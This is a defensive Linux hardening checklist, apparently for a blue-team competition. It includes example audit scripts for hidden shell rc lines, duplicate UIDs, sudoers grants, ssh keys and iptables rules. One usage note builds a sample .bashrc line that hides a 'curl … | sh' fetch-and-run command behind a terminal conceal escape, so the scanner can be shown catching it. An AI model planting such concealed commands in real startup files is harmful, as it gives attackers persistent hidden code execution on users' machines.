Note: see OS info to get command history working on root, but please disable network connections and crontabs first.
This should be in some sort of documentation, but if not, refer to the scoreboard (it tells you which services must stay up) and enumerate what is actually running with ss -tulpn (listening TCP/UDP sockets with the owning process) and ps flax (the full process tree).
Note that iptables rules do not persist across reboots. Either install the iptables-persistent package (it loads /etc/iptables/rules.v4 at boot, so write your iptables-save output there) or restore the saved rules by hand after booting with iptables-restore < /etc/iptables/rules (use whichever path you saved them to).
Refer to the IPtables guide
Refer to Crontabs
Refer to Processes
Refer to Services
# A red team can hide lines in these files with terminal escape sequences or a carriage return
# so that `cat` shows something other than what the shell will run (`cat` itself executes nothing).
# Read them with `cat -v`, `less`, or an editor like vi, vim, nano, which make such bytes visible.
# Remember these files run on every login / new shell, so anything planted here re-runs each time.
# Bash (most common)
vi /root/.bashrc
vi /home/<user>/.bashrc
# Sh (login shells read .profile; .shrc is only read if $ENV points at it)
vi /root/.shrc
vi /home/<user>/.shrc
# Zsh
vi /root/.zshrc
vi /home/<user>/.zshrc
# Also check the per-user .profile / .bash_profile / .bash_logout and the system-wide files:
# /etc/profile, /etc/profile.d/*, /etc/bash.bashrc, /etc/zsh/*
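Doing the above by hand for every account is slow, and the thing `cat` cannot show you is the interesting part. The script below is an added example, not code from the page: `list_rc_files` builds the list of startup files for every account with a real login shell (from a passwd file you pass in), and `scan_nonprint` flags lines containing bytes outside printable ASCII and whitespace, the escape sequences and carriage returns a hidden line needs. The passwd contents and the `.bashrc` with a concealed `curl | sh` line used in the usage note are constructed samples; the `RC_SCAN_RUN` variable is an assumption of this script, not a convention of the page.

```sh
#!/bin/sh
# Added example: enumerate shell startup files for every account with a real
# shell, then flag lines containing non-printable bytes (ESC sequences, CR)
# that a plain 'cat' would render invisibly.
#
#   RC_SCAN_RUN=1 sh rcscan.sh      # scan the live system

# Startup files to inspect in each home directory (bash, sh, zsh; login and
# interactive variants) plus the system-wide ones.
RC_NAMES=".bashrc .bash_profile .bash_login .bash_logout .profile .shrc .zshrc .zprofile .zlogin .zlogout .zshenv"
SYSTEM_RC="/etc/profile /etc/bash.bashrc /etc/zsh/zshrc /etc/zsh/zshenv /etc/zsh/zprofile"

# list_rc_files <passwd-file>: print every existing startup file for users
# whose login shell is not nologin/false, plus the system-wide files.
list_rc_files() {
  for f in $SYSTEM_RC /etc/profile.d/*; do
    if [ -f "$f" ]; then echo "$f"; fi
  done
  awk -F: '$7 !~ /(nologin|false)$/ {print $6}' "$1" | while read -r home; do
    for n in $RC_NAMES; do
      if [ -f "$home/$n" ]; then echo "$home/$n"; fi
    done
  done
}

# scan_nonprint <file>: returns 0 if the file contains only printable ASCII
# and whitespace, otherwise prints the offending lines (control bytes shown as
# ^[ etc. by cat -v) and returns 1. Non-ASCII bytes (UTF-8 comments) are
# flagged too; review them rather than assume they are harmless.
scan_nonprint() {
  findings=$(LC_ALL=C grep -n '[^[:print:][:blank:]]' "$1" | cat -v)
  [ -n "$findings" ] || return 0
  printf '%s: suspicious bytes\n%s\n' "$1" "$findings"
  return 1
}

if [ "${RC_SCAN_RUN:-0}" = "1" ]; then
  list_rc_files /etc/passwd | while read -r f; do
    scan_nonprint "$f" || true
  done
fi
```

On a constructed `.bashrc` containing `alias ls=ls` followed by a line wrapped in the SGR "conceal" sequence (`printf '\033[8mcurl http://example.invalid/x | sh\033[0m\n'`), plain `cat` on most terminals prints only the alias, while `scan_nonprint` reports line 2 as `^[[8mcurl http://example.invalid/x | sh^[[0m`. Accounts with `nologin` or `false` as their shell are skipped because nothing reads their rc files; a red team that has changed such a shell to `/bin/sh` shows up in the user review below instead.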
See the OS info page for more information (please read the user and password sections before just determining if a user is 'good' or not)
Also verify UIDs: there should be no duplicates, and only root should have UID 0.
# Show all duplicate UIDs
cut -d: -f3 /etc/passwd | sort | uniq -d
# See which users share a duplicate UID (replace <UID> with a value from the command above;
# matching on the third field avoids false hits on a GID with the same number)
awk -F: '$3 == <UID>' /etc/passwd
# Print any user with an empty password field (set passwords for these; "!" or "*" means locked, which is fine)
sudo awk -F: '$2==""{print $1}' /etc/shadow
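The three checks above as one function that can be run against copies of the files (useful when comparing several boxes) and that also catches the case the page's wording implies but the commands do not test, a second UID-0 account. This is an added example, not code from the page; the passwd and shadow contents in the test are constructed, with `HASH` standing in for a real password hash.

```sh
#!/bin/sh
# Added example: account audit over a passwd and a shadow file.
# Prints each finding and returns 1 if anything was found, 0 if clean.
#
#   sudo sh useraudit.sh            # audit the live /etc/passwd and /etc/shadow

# audit_accounts <passwd-file> <shadow-file>
audit_accounts() {
  passwd=$1
  shadow=$2
  rc=0

  # Duplicate UIDs: two names resolving to the same numeric identity.
  for uid in $(cut -d: -f3 "$passwd" | sort | uniq -d); do
    awk -F: -v u="$uid" '$3 == u {print "duplicate UID " u ": " $1}' "$passwd"
    rc=1
  done

  # Any account other than root with UID 0 is root under another name.
  extra=$(awk -F: '$3 == 0 && $1 != "root" {print $1}' "$passwd")
  if [ -n "$extra" ]; then
    echo "extra UID-0 accounts: $extra"
    rc=1
  fi

  # Empty second field in shadow = no password at all. "!" or "*" is a
  # locked account and is not reported.
  empty=$(awk -F: '$2 == "" {print $1}' "$shadow")
  if [ -n "$empty" ]; then
    echo "empty password: $empty"
    rc=1
  fi

  return $rc
}

if [ "${USER_AUDIT_RUN:-0}" = "1" ]; then
  audit_accounts /etc/passwd /etc/shadow
fi
```

Run it as root (shadow is mode 0640). The `USER_AUDIT_RUN` guard is this script's own convention so the functions can be sourced into another script; with it set, the exit status alone tells a loop over several machines which ones need attention.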
# Open /etc/sudoers with syntax checking (visudo refuses to save a broken file, which would lock everyone out of sudo).
# Look for NOPASSWD, `Defaults !authenticate`, and ALL=(ALL) ALL grants to users or groups that should not have them;
# `sudo -l -U <user>` shows what a given user can actually run.
visudo
# Check the sudoers directory (everything in here is read as if it were in /etc/sudoers)
ls -la /etc/sudoers.d/
# Check ssh directories for keys: authorized_keys (and authorized_keys2) is what lets someone log in with a key,
# so read each one and remove any entry you did not put there (we likely don't need ssh keys at all)
ls -la /root/.ssh
ls -la /home/<user>/.ssh
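The sudoers and ssh-key reviews above are the same kind of check: list every grant and every key, and decide whether each one should exist. Added example, not from the page: `audit_sudoers` prints the lines of one or more sudoers files that merit a look (NOPASSWD, `Defaults !authenticate`, and any non-root user or group given `ALL=... ALL`), and `list_authorized_keys` walks every home directory in a passwd file and prints the type and comment of each key in `authorized_keys`, so an unfamiliar comment stands out. The sudoers lines, key material and account names in the test are constructed.

```sh
#!/bin/sh
# Added example: flag risky sudoers entries and enumerate authorized ssh keys.
#
#   sudo sh sudokeys.sh    # with SUDOKEYS_RUN=1 to audit the live system

# audit_sudoers <file>...: print file:line: entry for lines worth reviewing.
# Only lines a default Debian/Ubuntu install would carry as "root ALL=(ALL:ALL) ALL"
# are left alone; %sudo / %wheel grants are printed so you check the group members.
audit_sudoers() {
  awk '
    /^[[:space:]]*(#|$)/                       { next }   # comments, blank lines
    /^Defaults/ && /!authenticate/             { print FILENAME ":" FNR ": " $0; next }
    /NOPASSWD/                                 { print FILENAME ":" FNR ": " $0; next }
    $1 != "root" && /ALL[[:space:]]*=.*ALL/    { print FILENAME ":" FNR ": " $0 }
  ' "$@"
}

# list_authorized_keys <passwd-file>: for every account, print
# "user: path: keytype comment" for each key in ~/.ssh/authorized_keys{,2}.
# Key lines are "[options] type base64 [comment]"; the type is the first field
# that looks like one, so option prefixes such as command="..." are skipped.
list_authorized_keys() {
  awk -F: '{print $1 ":" $6}' "$1" | while IFS=: read -r user home; do
    for f in "$home/.ssh/authorized_keys" "$home/.ssh/authorized_keys2"; do
      [ -f "$f" ] || continue
      awk -v u="$user" -v f="$f" '
        /^[[:space:]]*(#|$)/ { next }
        {
          t = "?"; c = ""
          for (i = 1; i <= NF; i++)
            if ($i ~ /^(ssh-|ecdsa-|sk-)/) { t = $i; c = $(i + 2); break }
          print u ": " f ": " t " " c
        }' "$f"
    done
  done
}

if [ "${SUDOKEYS_RUN:-0}" = "1" ]; then
  audit_sudoers /etc/sudoers /etc/sudoers.d/*
  list_authorized_keys /etc/passwd
fi
```

A key comment is free text chosen by whoever generated the key, so an expected-looking comment proves nothing; what the listing gives you is a complete inventory to compare against the keys the team actually issued. An `authorized_keys` entry with a `command=` option is not safer than one without: it restricts what the key can run, but it is still a way in.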
Refer to the logging guide
[todo]
Refer to Service Hardening
When hardening multiple machines, complete steps one and two on each machine first before moving on to the later steps.
Refer to the IPtables guide for more information
# Set variables
IPTABLES=/sbin/iptables
# Remove previous firewall rules (run all commands in order).
# Do this from the console or with a fallback in place: as soon as the policies are DROP,
# an SSH session without a matching ACCEPT rule is cut off.
$IPTABLES -F
$IPTABLES -F -t nat
# -X removes user-defined chains (filter table only; add -t nat to do the same there)
$IPTABLES -X
$IPTABLES -P INPUT DROP
$IPTABLES -P OUTPUT DROP
$IPTABLES -P FORWARD DROP
# Add ACCEPT rules for loopback, established connections and the scored services (see the IPtables guide),
# then save the result; this is the file to restore after a reboot
iptables-save > ~/rules
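The sequence above, flush everything, set DROP policies, then add ACCEPT rules, has a window during which the box accepts nothing, which is why it wants a console. An alternative that avoids the window is to write the whole ruleset in iptables-restore format and load it in one call, which iptables-restore applies atomically. The script below is an added example, not code from the page or the IPtables guide it refers to: `gen_rules` produces a ruleset that flushes the nat and filter tables, sets all three policies to DROP, and allows only loopback, established/related traffic and the ports you list (taken from the scoreboard); with `FW_APPLY=1` it is loaded and then saved with `iptables-save` exactly as above. The `ALLOW_*` and `FW_APPLY` variable names and the DNS/NTP outbound defaults are this script's assumptions.

```sh
#!/bin/sh
# Added example: build an iptables-restore ruleset and apply it atomically.
#
#   sh firewall.sh                                       # print ruleset, review it
#   FW_APPLY=1 ALLOW_TCP="22 80 443" ALLOW_UDP="53" sh firewall.sh

# valid_port <n>: digits only, 1-65535; rejects junk before it reaches iptables.
valid_port() {
  case $1 in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# gen_rules <in-tcp> <in-udp> <out-tcp> <out-udp>
# Each argument is a space-separated port list. Prints iptables-restore format.
gen_rules() {
  for p in $1 $2 $3 $4; do
    valid_port "$p" || { echo "gen_rules: bad port '$p'" >&2; return 1; }
  done
  # Declaring the nat table with empty chains replaces it, the same effect as -F -t nat.
  echo '*nat'
  echo ':PREROUTING ACCEPT [0:0]'
  echo ':INPUT ACCEPT [0:0]'
  echo ':OUTPUT ACCEPT [0:0]'
  echo ':POSTROUTING ACCEPT [0:0]'
  echo 'COMMIT'
  echo '*filter'
  echo ':INPUT DROP [0:0]'
  echo ':FORWARD DROP [0:0]'
  echo ':OUTPUT DROP [0:0]'
  # Loopback and replies to connections we already accepted.
  echo '-A INPUT -i lo -j ACCEPT'
  echo '-A OUTPUT -o lo -j ACCEPT'
  echo '-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT'
  echo '-A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT'
  echo '-A INPUT -m conntrack --ctstate INVALID -j DROP'
  # Scored services in; explicitly listed services out. Everything else hits the DROP policy.
  for p in $1; do echo "-A INPUT -p tcp --dport $p -m conntrack --ctstate NEW -j ACCEPT"; done
  for p in $2; do echo "-A INPUT -p udp --dport $p -j ACCEPT"; done
  for p in $3; do echo "-A OUTPUT -p tcp --dport $p -m conntrack --ctstate NEW -j ACCEPT"; done
  for p in $4; do echo "-A OUTPUT -p udp --dport $p -j ACCEPT"; done
  echo 'COMMIT'
}

IN_TCP=${ALLOW_TCP:-22}
IN_UDP=${ALLOW_UDP:-}
OUT_TCP=${ALLOW_OUT_TCP:-}
OUT_UDP=${ALLOW_OUT_UDP:-53 123}   # DNS and NTP out by default; add 80/443 to OUT_TCP for updates

if [ "${FW_APPLY:-0}" = "1" ]; then
  gen_rules "$IN_TCP" "$IN_UDP" "$OUT_TCP" "$OUT_UDP" | iptables-restore && iptables-save > ~/rules
else
  gen_rules "$IN_TCP" "$IN_UDP" "$OUT_TCP" "$OUT_UDP"
fi
```

Because the OUTPUT policy is DROP, the box can only answer connections it accepted and open the outbound ports you list; if a scored service needs to reach something (a database, an upstream DNS), that port has to be in `ALLOW_OUT_TCP` or `ALLOW_OUT_UDP`. If you run iptables-persistent, send the printed ruleset to /etc/iptables/rules.v4 instead of `~/rules` so it is reloaded at boot. Atomic loading removes the flush-to-allow gap, but it does not save you from leaving 22 out of `ALLOW_TCP` while connected over SSH, so the console advice stands.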
Refer to updates and installs